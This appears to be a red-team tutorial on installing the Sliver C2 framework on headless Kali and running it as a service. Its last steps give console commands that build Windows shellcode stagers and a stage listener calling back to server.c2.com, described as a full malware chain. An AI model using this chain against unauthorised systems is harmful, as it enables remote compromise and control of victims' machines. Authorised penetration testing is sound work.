Configuring Sliver as a C2 server

Headless Kali with Sliver C2

Notes on how to set up a headless Kali Linux server and install the Sliver C2 framework for red teaming and penetration testing.

Step 1: Configure Kali Linux Repository

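Start by writing the Kali Linux repository to your system's sources list. Because tee is used without -a, this replaces the existing contents of /etc/apt/sources.list rather than appending to them.
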
echo "deb http://http.kali.org/kali kali-rolling main contrib non-free non-free-firmware" | sudo tee /etc/apt/sources.list

Step 2: Download Kali Keyring

To let APT verify the signatures on Kali packages, install the Kali archive keyring. The download below uses plain HTTP, so the keyring package itself is not authenticated in transit; verify the file against a checksum obtained over a trusted channel before installing it.

  1. Navigate to the Kali keyring pool: Kali Archive Keyring.
  2. Download the latest .deb file, for example:

     wget http://http.kali.org/kali/pool/main/k/kali-archive-keyring/kali-archive-keyring_2020.2_all.deb

  3. Install the keyring:

     sudo dpkg -i kali-archive-keyring_2020.2_all.deb

  4. Clean up by removing unnecessary .deb files:

     rm -r *.deb

Step 3: Update Your System

Once the keyring is in place, update your package list:

sudo apt-get update

Step 4: Install Kali Linux Core and Essential Tools

To install the headless Kali Linux environment (without GUI), execute the following:

sudo apt-get install kali-defaults kali-linux-core
sudo apt-get install ufw
sudo ufw allow 22

Next, create a user and add them to the sudo group:

sudo adduser user && sudo usermod -aG sudo user

Step 5: Install Sliver Server and Client

Sliver is a modern C2 framework used for post-exploitation. First, list the download URLs of the Linux server and client binaries in the latest release using GitHub’s API (requires curl and jq):

curl -s https://api.github.com/repos/BishopFox/sliver/releases/latest \
  | jq -r '.assets | .[] | .browser_download_url' \
  | grep -E '(sliver-server_linux|sliver-client_linux)$'

Once you have the URLs for the server and client, use wget to download each binary into /usr/local/bin and make it executable, then unpack the server's bundled assets. The URLs below are for release v1.5.42:

# Server
wget -O /usr/local/bin/sliver-server https://github.com/BishopFox/sliver/releases/download/v1.5.42/sliver-server_linux && chmod 755 /usr/local/bin/sliver-server
# Client
wget -O /usr/local/bin/sliver https://github.com/BishopFox/sliver/releases/download/v1.5.42/sliver-client_linux && chmod 755 /usr/local/bin/sliver
sliver-server unpack --force

Step 6: Set Up Sliver as a Service

Create a systemd service for Sliver so it runs on boot. Open a new service configuration:

sudo vim /etc/systemd/system/sliver.service

Insert the following service configuration:

[Unit]
Description=Sliver
After=network.target
StartLimitIntervalSec=0

[Service]
Type=simple
Restart=on-failure
RestartSec=3
User=root
ExecStart=/usr/local/bin/sliver-server daemon

[Install]
WantedBy=multi-user.target

Now, enable the service so that it starts on boot, and start it:

systemctl enable sliver
systemctl start sliver

Step 7: Set Up the Operator

Generate an operator profile for your Sliver C2 setup. This allows you to interact with the C2 server and perform further actions. Run the following:

sliver-server operator --name operator --lhost operator.c2.com --save /tmp/serve

mv the_config_file /home/user/.sliver-client/configs
chown -R user:user /home/user/.sliver-client/ && chmod 600 /home/user/.sliver-client/configs/operator_localhost.cfg
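
A check worth running after this step, as an added example that is not part of the original post: the operator config carries the credentials the client uses to authenticate to the server, so nothing in the configs directory should be accessible to group or others. The function name audit_operator_configs is hypothetical, and the directory layout is assumed to be the one used above.

```bash
# Added example (not from the original post).
# Assumption: operator configs live in a directory such as
# /home/user/.sliver-client/configs, as in the step above. Uses GNU stat.

# Print one line per finding under DIR; return 0 if clean, 1 otherwise.
# Optional second argument: the numeric uid that should own the files.
audit_operator_configs() {
    local dir want_uid rc f mode uid
    dir="$1"
    want_uid="${2:-$(id -u)}"
    rc=0

    [ -d "$dir" ] || { echo "MISSING $dir"; return 1; }

    # The directory itself should not be listable or traversable by others.
    mode=$(stat -c '%a' "$dir")
    if [ $(( 0$mode & 077 )) -ne 0 ]; then
        echo "DIR_MODE $mode $dir"; rc=1
    fi

    for f in "$dir"/* "$dir"/.[!.]*; do
        # Skip unmatched glob patterns.
        [ -e "$f" ] || [ -L "$f" ] || continue
        # A symlink could point the client at a file outside this directory.
        if [ -L "$f" ]; then
            echo "SYMLINK $f"; rc=1; continue
        fi
        [ -f "$f" ] || continue
        mode=$(stat -c '%a' "$f")
        uid=$(stat -c '%u' "$f")
        # Any group/other permission bit exposes the operator credentials.
        if [ $(( 0$mode & 077 )) -ne 0 ]; then
            echo "FILE_MODE $mode $f"; rc=1
        fi
        if [ "$uid" != "$want_uid" ]; then
            echo "OWNER $uid $f"; rc=1
        fi
    done
    return $rc
}
```

Run it as the operator account, for example audit_operator_configs /home/user/.sliver-client/configs, and treat any output as a finding to fix with chown or chmod.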

Step 8: Generate Custom Shellcode

You can generate shellcode to create custom executables for your operations. Here’s how to generate a custom stager:

sliver > generate stager --lhost your.domain.com --lport 8443 --arch amd64 --format c --save <Location_to_save_file>

Step 9: Full Chain C2 Server with Malware

For a complete attack chain, you can create a malicious payload and listener setup. Execute the following in the Sliver console:

profiles new --mtls server.c2.com --skip-symbols --format shellcode --arch amd64 win64
profiles
mtls
jobs
stage-listener --url tcp://server.c2.com:8443 --profile win64
generate stager --lhost server.c2.com --lport 8443 --arch amd64 --format c

This post is licensed under CC BY 4.0 by the author.